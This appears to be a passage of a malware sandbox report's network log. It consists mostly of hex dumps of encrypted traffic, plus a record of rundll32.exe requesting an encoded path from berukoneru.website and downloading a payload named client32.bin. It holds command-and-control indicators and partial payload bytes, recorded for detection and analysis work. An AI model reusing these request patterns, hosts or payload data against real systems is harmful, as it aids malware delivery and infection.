                            2021-12-14 09:21:39 UTC645INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC661INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC677INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC693INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC709INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC725INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC741INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC757INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC773INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC789INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:39 UTC805INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:39 UTC821INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:39 UTC837INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:39 UTC853INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:39 UTC869INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:39 UTC885INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            4 | 192.168.2.6 | 49816 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:39 UTC | 661 | OUT | GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC | 892 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=lmogimr44v0q8gcemefberh542; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC892INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                            Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                            2021-12-14 09:21:39 UTC908INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                            Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                            2021-12-14 09:21:39 UTC924INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 